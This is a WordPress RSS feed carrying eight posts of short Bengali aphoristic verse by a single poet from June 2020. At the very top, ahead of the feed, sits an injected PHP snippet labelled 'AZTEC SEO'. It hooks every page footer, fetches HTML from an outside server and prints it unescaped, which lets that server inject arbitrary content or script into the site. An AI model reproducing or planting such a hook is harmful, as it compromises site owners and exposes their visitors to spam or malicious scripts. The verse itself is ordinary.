/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); কাব্য মঞ্জরী – Dhaka Sky News https://www.dhakaskynews.com Dhaka Sky News Tue, 23 Jun 2020 16:23:42 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.9 কাব্যোক্তি : গুচ্ছ-৮ https://www.dhakaskynews.com/kabbo_monjuri/2020/06/23/News_ID-555/ https://www.dhakaskynews.com/kabbo_monjuri/2020/06/23/News_ID-555/#respond Tue, 23 Jun 2020 09:46:11 +0000 https://www.dhakaskynews.com/?p=555  

আমি পূজনীয় কিংবা পূজারী হতে চাই
এ ছাড়া অন্যথা সুখ নাই।
*
উদীয়মান ভোরের সূর্যের পানে
আমি প্রত্যহ ছুটি পতঙ্গের মতো।
*
জ্ঞানীর রসিকতায় মধু পড়ে
মুর্খের রসিকতায় রক্ত ঝরে।
*
দুরাত্মার আত্মীয় আমি
নরক আমার জন্যে।
*
বৃক্ষের শাখা যত প্রসারিত
শিকড় তত বিস্তৃত।

 

-জামাল উদ্দিন আহমাদ

]]>
https://www.dhakaskynews.com/kabbo_monjuri/2020/06/23/News_ID-555/feed/ 0
কাব্যোক্তি : গুচ্ছ-৭ https://www.dhakaskynews.com/kabbo_monjuri/2020/06/23/News_ID-551/ https://www.dhakaskynews.com/kabbo_monjuri/2020/06/23/News_ID-551/#respond Tue, 23 Jun 2020 09:16:41 +0000 https://www.dhakaskynews.com/?p=551  

পতঙ্গবৃত্ত মন আমার
পাখা মেলে আগুনে।
*
আগুনের ফুল দেখে মুগ্ধ হলাম
উত্তাপ নিতে গিয়ে দগ্ধ হলাম।
*
দুরান্তপনা দেখে বিস্মিত হই
তুমি কাঁদবে নাকি কাঁদাবে?
*
রাজত্ব আমি পাইনি-
পেয়েছি অনেক রাজ্যের স্বপ্ন।
*
শ্রাবণে আকাশ কাঁদে
চৈত্রে কাঁদে মৃত্তিকা।

 

-জামাল উদ্দিন আহমাদ

]]>
https://www.dhakaskynews.com/kabbo_monjuri/2020/06/23/News_ID-551/feed/ 0
কাব্যোক্তি : গুচ্ছ-৬ https://www.dhakaskynews.com/kabbo_monjuri/2020/06/23/News_ID-545/ https://www.dhakaskynews.com/kabbo_monjuri/2020/06/23/News_ID-545/#respond Tue, 23 Jun 2020 07:47:49 +0000 https://www.dhakaskynews.com/?p=545  

কালো মানুষকে যেমন সাদা হওয়া কঠিন
তার চেয়েও কঠিন আমাদের সভ্য হওয়া।
*
একাকিত্ব মানুষকে নীরবে কাঁদায়
আর অর্থকষ্ট নিদারুণ ভোগায়।
*
নির্লোভ মানুষ অতটা উদার হতে পারে না
যেমনি উদারতা দেখিয়ে লোভীরা লোক ভোলোয়।
*
বনের পাখি যদি খাঁচায় সুখী হতো
তবে আমি তাকে সোনার খাঁচায় বাঁধতাম।
*
আমি সৈনিক তুমি সেবিকা
আমি বীর তুমি রূপসী অঙ্গনা।

 

-জামাল উদ্দিন আহমাদ

]]>
https://www.dhakaskynews.com/kabbo_monjuri/2020/06/23/News_ID-545/feed/ 0
কাব্যোক্তি : গুচ্ছ-৫ https://www.dhakaskynews.com/kabbo_monjuri/2020/06/23/News_ID-540/ https://www.dhakaskynews.com/kabbo_monjuri/2020/06/23/News_ID-540/#respond Tue, 23 Jun 2020 07:09:55 +0000 https://www.dhakaskynews.com/?p=540  

ভাব সাগরের বিজ্ঞ নাবিক, জানি না সন্তরণ
গহীন জলে সদাই ডুবাই শোলার মতো মন।
*
স্বাধীন স্বাধীন বলে আর কাঁদিস নারে মন
স্বাধীন হওয়ার শর্ত আগে আত্মনিয়ন্ত্রণ।
*
ধেয়ানে মুহূর্তের প্রাপ্তি- পাবার নয়
হাজার বছর বিজ্ঞান সাধনায়।
*
করুণা সিন্ধু চাহি না বন্ধু
ভালোবাসা দিও এক বিন্দু।
*
নিঃসঙ্গতা বিষণ্ণ আনে
বিষাদে মানুষ জীবন্ত লাশ।

 

-জামাল উদ্দিন আহমাদ

]]>
https://www.dhakaskynews.com/kabbo_monjuri/2020/06/23/News_ID-540/feed/ 0
কাব্যোক্তি : গুচ্ছ-৪ https://www.dhakaskynews.com/kabbo_monjuri/2020/06/23/News_ID-536/ https://www.dhakaskynews.com/kabbo_monjuri/2020/06/23/News_ID-536/#respond Tue, 23 Jun 2020 06:39:08 +0000 https://www.dhakaskynews.com/?p=536  

তরিৎ অপেক্ষা জ্যোতি অধিক গতিময়,
তার চেয়ে গতিময় মানুষের মন।
*
যার ঈমান আছে, আজরাইল তারে ডরায়
শয়তান থাকে বহু দূরে।
*
গুরুভক্তির নমুনাস্বরূপ সালাম ঠুকি পা’য়-
ভাবি না কভু, কত ত্যাগ করেছিল মা’য়।
*
অতৃপ্ত আত্মার স্থান স্বর্গেও নেই
দেহেও তা নিষ্প্রাণ।
*
শাশ্বত প্রেমের ধারা
কালের স্রোতে বহমান।

 

 

-জামাল উদ্দিন আহমাদ

]]>
https://www.dhakaskynews.com/kabbo_monjuri/2020/06/23/News_ID-536/feed/ 0
কাব্যোক্তি : গুচ্ছ-৩ https://www.dhakaskynews.com/kabbo_monjuri/2020/06/23/News_ID-529/ https://www.dhakaskynews.com/kabbo_monjuri/2020/06/23/News_ID-529/#respond Tue, 23 Jun 2020 06:01:23 +0000 https://www.dhakaskynews.com/?p=529  

জৈব সত্তার ষড়বৃত্তি মাঝে
পরম সত্তার বসবাস।
*
স্বার্থের টানে পৃথিবীটা অন্ধ
আত্মপক্ষ প্রশ্নে পিতা-পুত্র দ্বন্দ্ব।
*
ভোগ ক্ষণিকের তরে
প্রেম অনন্ত অনিবার।
*
চতুর মানুষ লাঞ্ছিত হয়
ধিকৃত হয় বোকা।
*
মানুষ মরে যায়, আসে নতুন মানুষ
পৃথিবীতে রেখে যায় স্মৃতির ফানুস।

 

-জামাল উদ্দিন আহমাদ

]]>
https://www.dhakaskynews.com/kabbo_monjuri/2020/06/23/News_ID-529/feed/ 0
কাব্যোক্তি : গুচ্ছ-২ https://www.dhakaskynews.com/kabbo_monjuri/2020/06/22/News_ID-514/ https://www.dhakaskynews.com/kabbo_monjuri/2020/06/22/News_ID-514/#respond Mon, 22 Jun 2020 10:34:11 +0000 https://www.dhakaskynews.com/?p=514  

বিয়ে হচ্ছে নারী-পুরুষ দুজনে একত্রে জীবন যাপনের
ধর্মীয় ও সামাজিক বিধিবদ্ধ রেওয়াজ।
*
ধন অপেক্ষা জ্ঞান আহরণ কঠিন
তার চেয়ে কঠিন জ্ঞানের সৃষ্টি।
*
বৈরি প্রকৃতি জীবনকে সহিষ্ণু করে
উদারতা করে উদাস।
*
হৃদয়ের রাজ্য নিঃসীম স্বাধীন
আইনের শাসন মানে না, বাধা-বন্ধনহীন।
*
রূপ কারো ইতিহাসে লেখা নাই
কর্মের গুণে তথা রাজকীয় ঠাঁই।

 

-জামাল উদ্দিন আহমাদ

]]>
https://www.dhakaskynews.com/kabbo_monjuri/2020/06/22/News_ID-514/feed/ 0
কাব্যোক্তি : গুচ্ছ-১ https://www.dhakaskynews.com/kabbo_monjuri/2020/06/22/News_ID-494/ https://www.dhakaskynews.com/kabbo_monjuri/2020/06/22/News_ID-494/#respond Mon, 22 Jun 2020 06:36:55 +0000 https://www.dhakaskynews.com/?p=494  

সৃষ্টির তরে কল্যাণ ধারা করিয়া বর্ষণ
তৃপ্ত হন মহান দাতা প্রভু নিরঞ্জন।
*
ফুল ফুটে ফুটে যদি না ঝড়ে যায়
কি করে নতুন ফুল ফুটবে তথায়।
*
দুর্গ অপেক্ষা মানুষের মন জয় করা কঠিন
তার চেয়েও কঠিন আত্মনিয়ন্ত্রণ।
*
জৈবদেহের লিঙ্গভেদ হয়-
আত্মার বিচারে কেউ নারী-পুরুষ নয়।
*
পরিণয়ে প্রেমের মৃত্যু হয়-
জীবন-সংসার যুদ্ধময়।

-জামাল উদ্দিন আহমাদ

]]>
https://www.dhakaskynews.com/kabbo_monjuri/2020/06/22/News_ID-494/feed/ 0